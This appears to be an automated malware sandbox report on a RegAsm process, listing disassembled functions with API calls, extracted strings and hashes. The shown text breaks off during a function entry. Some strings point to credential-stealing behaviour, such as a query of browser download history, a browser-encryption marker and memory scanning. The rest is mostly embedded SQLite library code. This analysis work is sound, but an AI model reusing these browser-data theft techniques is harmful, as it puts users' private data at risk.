Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1deefbe7dfe8fe2cc6d02505b3576cc4df8946bbd2daf24fdae8128a6db1a289
Instruction ID: edcac34c3f1d2ad38fcf68930fe53886c797b9d8f18ff93ca8b859645e64c130
Opcode Fuzzy Hash: 1deefbe7dfe8fe2cc6d02505b3576cc4df8946bbd2daf24fdae8128a6db1a289
Instruction Fuzzy Hash: E401D6329045ADEFCB018FA4DC44BBEB7B8FB48B14F440965F856A32C0EB789801CA44

Uniqueness

Uniqueness Score: -1.00%

Function 00408400 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 302stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004086F8
lstrlen.KERNEL32(00000000), ref: 0040870C

Strings

SELECT target_path, tab_url from downloads, xrefs: 004085B7
Downloads, xrefs: 00408444
Downloads, xrefs: 004084C8

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 1951da29600124bb4dbb00d7bb5c50788118c9651fbd28057b8f380e682d4767
Instruction ID: 54a70b35f2e3bd0bead06bd516102e4005ef58b22266876870fc93898b796347
Opcode Fuzzy Hash: 1951da29600124bb4dbb00d7bb5c50788118c9651fbd28057b8f380e682d4767
Instruction Fuzzy Hash: 8FC16F71805248EACB05EBA5D951BDDBBB86F19308F1441AEF506B3282DF785B0CC779

Uniqueness

Uniqueness Score: -1.00%

Function 0040F240 Relevance: 7.7, APIs: 5, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040F255
??_U@YAPAXI@Z.MSVCRT ref: 0040F282

Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F07D
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F097
Part of subcall function 0040F070: strlen.MSVCRT ref: 0040F152

VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,00000000,00000000,00000000,?,0040FC51,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF,00000FFF), ref: 0040F2CE
VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040F3B4
??_V@YAXPAX@Z.MSVCRT ref: 0040F3C3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID:
API String ID: 3099930812-0
Opcode ID: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
Instruction ID: 067aa555f17516b8096591eac6b752a234b9d284ae0b983da437ecac591d64d5
Opcode Fuzzy Hash: 7c9b4c0b51c3ad2c2cdcaa8eef9269b8eebedcbf7ef5882b7756a5f9efe6eb19
Instruction Fuzzy Hash: 25519175A00118ABEB24DE69DD41ABFB3FAEB88714F14413AFD05E7380E638DD0187A5

Uniqueness

Uniqueness Score: -1.00%

Function 004070D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040710B
memset.MSVCRT ref: 00407139
LocalAlloc.KERNEL32(00000040,?), ref: 00407170

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

@, xrefs: 00407151
v10, xrefs: 00407105

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
Instruction ID: 1ad0ea3c5568345b5ddcad74f610c07972afb0beca4ce7e104c85093a37f4707
Opcode Fuzzy Hash: a8a8207e43a13d49a5b41ba8a5176773fcd3b2b4e8d669f2682076d218f8a936
Instruction Fuzzy Hash: C941AD71E04219EBCB14DF94DC01BAEB7B8AB44B14F10426EF915B72C0DBB86905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B831 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041B83D

Part of subcall function 0041BA14: __getptd_noexit.LIBCMT ref: 0041BA17
Part of subcall function 0041BA14: __amsg_exit.LIBCMT ref: 0041BA24

__getptd.LIBCMT ref: 0041B854
__amsg_exit.LIBCMT ref: 0041B862
__lock.LIBCMT ref: 0041B872
__updatetlocinfoEx_nolock.LIBCMT ref: 0041B886

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction ID: 838ad8bec1577741fb6ee50676f92d0b4110c482cf9a1a1505d817c5540a6f99
Opcode Fuzzy Hash: 5c3cacb0f7ad1bba531c55489a9aabdf1faedfa9b12995f3489998ccd8b0754d
Instruction Fuzzy Hash: 8AF062319417109BDA10BB666803BCE6290EF00B68F10421FE450672D2CB3C49C1CADE

Uniqueness

Uniqueness Score: -1.00%

Function 19B873C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

fts5: syntax error near "%.*s", xrefs: 19B8751C

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: fts5: syntax error near "%.*s"
API String ID: 0-498961494
Opcode ID: 5d0aab6b76304af5daae07d5a0f6cdc2b334e5afa301b3af3f678090e43ab0b4
Instruction ID: bdc43949d5fda23e8f588a0414512dbb450e6f66bac67082ada6f1a75619a000
Opcode Fuzzy Hash: 5d0aab6b76304af5daae07d5a0f6cdc2b334e5afa301b3af3f678090e43ab0b4
Instruction Fuzzy Hash: F0B1ABB4904355DFD310CF24C8C0B5ABBE4EF88748F58496DE8C987280E775E596CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 19A7F7F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

integer overflow, xrefs: 19A7F8ED

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: integer overflow
API String ID: 0-1678498654
Opcode ID: 08abd72d5ae12202a108b039db14acce508f41ecd2bce3f7ec78416bbb826fb1
Instruction ID: c4f28b5a2563f633f15259f818dce05d22a7cc1eda7af8229c68f96f73b5e92a
Opcode Fuzzy Hash: 08abd72d5ae12202a108b039db14acce508f41ecd2bce3f7ec78416bbb826fb1
Instruction Fuzzy Hash: C8110075C047116BDB05AF24AD02B8A77A96F16720F0E5399E8585A1F2E72292CCC3D2

Uniqueness

Uniqueness Score: -1.00%

Function 19A77D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap3, xrefs: 19A77F1D
winShmMap2, xrefs: 19A77E1F
winShmMap1, xrefs: 19A77DC5

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 3343e297b7d99e8a9a7921e1d27eb07f53f685fda5ac980aad08f227dd5f1a7c
Instruction ID: 7ed666272f65c50ec66f4a6e1bccc60e3aa79d963ec3df0d0f95cd1d463cf5d2
Opcode Fuzzy Hash: 3343e297b7d99e8a9a7921e1d27eb07f53f685fda5ac980aad08f227dd5f1a7c
Instruction Fuzzy Hash: 056116715003519FD718CF64CD82B27BBE9EF84B44F09486DF98697291EB32E809CB52

Uniqueness

Uniqueness Score: -1.00%

Function 19AA35E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

misuse, xrefs: 19AA35F4
%s at line %d of [%.10s], xrefs: 19AA35F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AA35EA

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 9f5532dac4629a799a767cc2c9fda830c1a4ca8bd24745e4f42ccc99b2b039db
Instruction ID: c86c52e2feb0820185242bb1501e937bc8a2fff0e7bc6ed5f4e17e71d45ab453
Opcode Fuzzy Hash: 9f5532dac4629a799a767cc2c9fda830c1a4ca8bd24745e4f42ccc99b2b039db
Instruction Fuzzy Hash: 1B51E4F5A00315AFC704CF14D884A57BBA9BF04B24F0D816DF8595B292EBB1EC58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19B196B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19B197EF
database corruption, xrefs: 19B197EA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B197E0

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: cb8a0df86b01df620868639d56f458134104b7741e05155fb6b5a8ee0b14d917
Instruction ID: 6390cb1662584e7d9e56a9def79fe907f23bfb13c087c98c012b4a768806dd45
Opcode Fuzzy Hash: cb8a0df86b01df620868639d56f458134104b7741e05155fb6b5a8ee0b14d917
Instruction Fuzzy Hash: A74105762046D08FD7218F68B4406D6FBE1DF42661F0C48BAD6D58B692E322E485D761

Uniqueness

Uniqueness Score: -1.00%

Function 19BE5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

misuse, xrefs: 19BE5980
%s at line %d of [%.10s], xrefs: 19BE5985
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19BE5976

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 3353177d600db1e63f8a6efe92805ff1a130d5c37d447b3d07f6bdd4cce10fc0
Instruction ID: c063d764f50ad6975fac580efcf6b00a8409d447bfa227ba91d4096452414771
Opcode Fuzzy Hash: 3353177d600db1e63f8a6efe92805ff1a130d5c37d447b3d07f6bdd4cce10fc0
Instruction Fuzzy Hash: A34129769003459BD710CA54CC81B9AB7E8EF85320F8C6569FC8497291F3B9F994C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19BF8850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19BF895F
os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 19BF88E2

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1037342196
Opcode ID: bc41dde650fcbc50015d2a12bf28eb72d7e058b8d243bbff08c8e9734a38949b
Instruction ID: dabea07c7e0894c3467667609bcab58dd693fc5ee81988c04bd191d722c0112a
Opcode Fuzzy Hash: bc41dde650fcbc50015d2a12bf28eb72d7e058b8d243bbff08c8e9734a38949b
Instruction Fuzzy Hash: 4D218E74608356AFD7209714CD84BEBBBD9EFD4700F4C8C1DE589C31A1D23098488353

Uniqueness

Uniqueness Score: -1.00%

Function 19AA5390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19AA540D
database corruption, xrefs: 19AA5408
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AA53FE

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 94686d143f8a47e98ec29e13b34d9611a456cd3dec69c3135f061e9a5b8ded33
Instruction ID: 200d016c5004a1a8499fd5ffb936c36afe6fc593c925ccd7942072b4df83640a
Opcode Fuzzy Hash: 94686d143f8a47e98ec29e13b34d9611a456cd3dec69c3135f061e9a5b8ded33
Instruction Fuzzy Hash: C431AC6524479147D3218B78A8403EAB7D69F41B12F0C646EE9C5C76D1E312F49AC365

Uniqueness

Uniqueness Score: -1.00%

Function 19B87ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

no such tokenizer: %s, xrefs: 19B87F1B
error in tokenizer constructor, xrefs: 19B87F92

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: ded6af476bd7595d766f876b97fd98e2dd56ea6dfc4451340338ad13b399696a
Instruction ID: 2c71ffe502136d1228cecff7e27bb1c82c8ce3904817505b79519e87ddfa6581
Opcode Fuzzy Hash: ded6af476bd7595d766f876b97fd98e2dd56ea6dfc4451340338ad13b399696a
Instruction Fuzzy Hash: CF31B2767012558FC710CF1AD880B6AB7E4EF88769F1945ADE988DB340E732EC15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 19A6F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

